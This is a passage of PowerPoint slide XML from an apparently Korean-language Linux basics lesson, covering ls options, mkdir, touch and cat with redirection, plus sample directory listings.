                <a:t>-x  4 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>4 20:17 .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x 25 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>22 14:37 ..</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0 12</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>3  2014 err.log</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0 12</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>3  2014 err_url.txt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–S  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>파일 크기 순으로 정렬하여 출력</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>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–r  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>알파벳 거꾸로 순으로 출력</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>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–R  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>하위 디렉토리 까지 출력</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>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–h  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>: K(kilo), M(mega), G(giga) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>단위를 사용하여 파일 크기를 사람이 보기 좋게 표시한다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>.</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>lu</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>atime(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>접근 시간 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                <a:t>read.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                <a:t>exec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>을 출력한다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>.</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–lc  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:  ctime(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>변경 시간 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>을 출력한다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>. </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–al e*.g  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:  ‘e'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>로 시작하고 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>‘.g'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>로 끝나는 디렉토리 내용을 출력한다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>.</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export]# ls  &gt; file.txt  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" err="1"/>
                <a:t>리다이렉션</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t> 연산자</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>(&gt;, &gt;&gt;)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>를 사용하여 디렉토리 내용을 파일에 저장할 수 있다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="110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/Theory/T2/4</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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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디렉토리 생성</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> /test</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 cd /test</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> -p /test1/test2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cd /test1/test2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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>pwd</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/test1/test2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> -p /test1/test2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cd /test1/test2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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>pwd</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/test1/test2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> -m 775 test3</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> -m 777 test4</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ls -l</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>8</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>drwxrwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>-x 2 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> 4096  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>22 15:03 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>drwxrwxrwx</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> 2 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> 4096  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>22 15:03 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test4</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="110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/Theory/T2/5</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t># touch : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일생성 및 날짜정보 변경</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>pwd</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/test1/test2</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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test3  test4</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touch newfile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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>newfile  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test3  test4</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touch -t 202106141200 newfile</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 -l</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>8</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0  6</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>14  2021 newfile</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxrwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x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test3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxrwxrwx</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>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test4</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touch oldfile</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ls -l</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>8</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0  6</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>14  2021 newfile</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0  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>22 15:08 oldfile</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxrwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x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test3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxrwxrwx</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>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test4</a:t>
              </a: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touch -r oldfile newfile</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ls -l</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>8</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0  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>22 15:08 newfile</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0  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>22 15:08 oldfile</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxrwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x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test3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxrwxrwx</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>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test4</a:t>
              </a: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/Theory/T2/6</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t># cat : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일생성 및 출력</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 -l &gt; file1</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cat file1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>8</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0  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>22 15:25 file1</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0  6</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>14  2021 newfile</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0  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>22 15:08 oldfile</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxrwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x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test3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxrwxrwx</a:t>
              </a:r>
              <a:r>
